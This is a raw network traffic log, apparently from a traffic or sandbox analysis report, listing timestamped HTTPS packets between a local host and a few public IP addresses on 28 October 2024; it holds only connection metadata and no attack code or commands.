                                                                            Oct 28, 2024 09:36:44.179502964 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.179517984 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.179796934 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.179850101 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.179863930 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.180155039 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.180210114 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.180222034 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.221803904 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.230319977 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.230370045 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.230406046 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.230426073 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.230454922 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.230478048 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.294805050 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.294823885 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.294877052 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.295100927 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.295111895 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.295157909 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.295169115 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.295178890 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.295222998 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.296061993 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.296071053 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.296133041 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.296184063 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.296192884 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.296235085 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.345859051 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.345906973 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.345947027 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.345954895 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.345985889 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.346009016 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.410325050 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.410435915 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.410495043 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.410537958 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.410598040 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.410612106 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.411211014 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.411299944 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.411333084 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.411391020 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.454592943 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.454696894 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.461458921 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.461488962 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.461554050 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.461561918 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.461596966 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.461616993 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.526989937 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.527046919 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.527085066 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.527084112 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.527128935 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.527162075 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.527162075 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.527219057 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.527335882 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.528600931 CET49778443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.528633118 CET44349778104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.576517105 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.576545000 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.576613903 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.576626062 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.579336882 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.678109884 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:44.678361893 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:44.678410053 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:44.679864883 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:44.679929018 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:44.680337906 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:44.680429935 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:44.680494070 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:44.691998005 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.692053080 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.692058086 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.692110062 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.692116976 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.692253113 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.721373081 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:44.721399069 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:44.762511015 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:44.778249025 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.778270960 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.778338909 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.778359890 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.778390884 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.778469086 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.845699072 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.845750093 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.845949888 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.846344948 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.846405029 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.847181082 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.847264051 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.847347021 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.848097086 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:44.848131895 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:44.858963013 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.858993053 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.859074116 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.859074116 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.859137058 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.859190941 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.923274994 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.923372030 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.923393965 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.923461914 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:44.923500061 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:44.923521042 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.038204908 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.038269043 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.038314104 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.038378954 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.038414955 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.038438082 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.061100960 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061253071 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061306953 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:45.061321974 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061407089 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061460972 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:45.061470032 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061569929 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061611891 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:45.061619997 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061836958 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.061888933 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:45.063782930 CET49785443192.168.2.4104.21.91.145
                                                                            Oct 28, 2024 09:36:45.063796043 CET44349785104.21.91.145192.168.2.4
                                                                            Oct 28, 2024 09:36:45.153723001 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.153785944 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.153831005 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.153893948 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.153932095 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.153956890 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.222810030 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.222876072 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.222924948 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.222991943 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.223031998 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.223054886 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.496051073 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.496082067 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.496131897 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.496166945 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.496185064 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.496215105 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.496418953 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.496465921 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.496471882 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.496510029 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.496546030 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.496589899 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.497744083 CET49779443192.168.2.4151.101.193.229
                                                                            Oct 28, 2024 09:36:45.497766972 CET44349779151.101.193.229192.168.2.4
                                                                            Oct 28, 2024 09:36:45.499773026 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.503900051 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.540093899 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.544271946 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.544300079 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.544615030 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.544635057 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.547746897 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.547825098 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.548429012 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.548501015 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.565085888 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.565525055 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.566668034 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.567070961 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.567084074 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.567116022 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.567194939 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.567219019 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.615345955 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.615350008 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.703655958 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.703807116 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.703901052 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.703977108 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.703988075 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704031944 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704037905 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.704171896 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704230070 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704236984 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704319000 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704334021 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704335928 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.704401016 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704406023 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704415083 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.704446077 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.704478025 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.704536915 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.704660892 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.705108881 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.705167055 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.705182076 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.708600044 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.708688021 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.708746910 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.709548950 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.709614038 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.709642887 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.752846956 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.752850056 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.752907991 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.799710035 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.820662975 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.820954084 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821038961 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821118116 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821178913 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.821202040 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821243048 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.821248055 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821314096 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821388006 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821429968 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.821436882 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821472883 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.821496010 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821552038 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.821568012 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821719885 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821775913 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.821789026 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.821975946 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.822328091 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.822385073 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.822397947 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.822504997 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.822560072 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.822571993 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.822627068 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.863970995 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.909080982 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.909101009 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.937464952 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.937611103 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.937663078 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.937678099 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.937715054 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.937721014 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.937800884 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938118935 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.938126087 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938178062 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938393116 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938441992 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.938448906 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938486099 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938564062 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.938585043 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938613892 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938700914 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.938718081 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938903093 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.938955069 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.938976049 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.939342976 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.939418077 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.939471960 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.939486980 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.939568996 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.939749002 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.980896950 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.980957031 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.980969906 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.981029987 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.981105089 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:45.981111050 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:45.987237930 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.034070015 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.054439068 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.054573059 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.054615974 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.054626942 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.054804087 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.054851055 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.054856062 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055368900 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055478096 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055533886 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.055538893 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055567980 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055634975 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055691957 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.055720091 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.055978060 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.056037903 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.056052923 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.056282997 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.056296110 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.056353092 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.056447983 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.056462049 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.096582890 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.096592903 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.096591949 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.096607924 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.143451929 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.143462896 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.143507957 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.143547058 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.171322107 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.171377897 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.171391010 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.171431065 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.171654940 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.171664000 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.171703100 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.171708107 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.171744108 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.172168016 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.172178030 CET44349787104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.172215939 CET49787443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.172544956 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.172620058 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.172642946 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.172713995 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.172758102 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.172776937 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.172816038 CET49786443192.168.2.4104.17.25.14
                                                                            Oct 28, 2024 09:36:46.173845053 CET44349786104.17.25.14192.168.2.4
                                                                            Oct 28, 2024 09:36:46.173863888 CET44349786104.17.25.14192.168.2.4
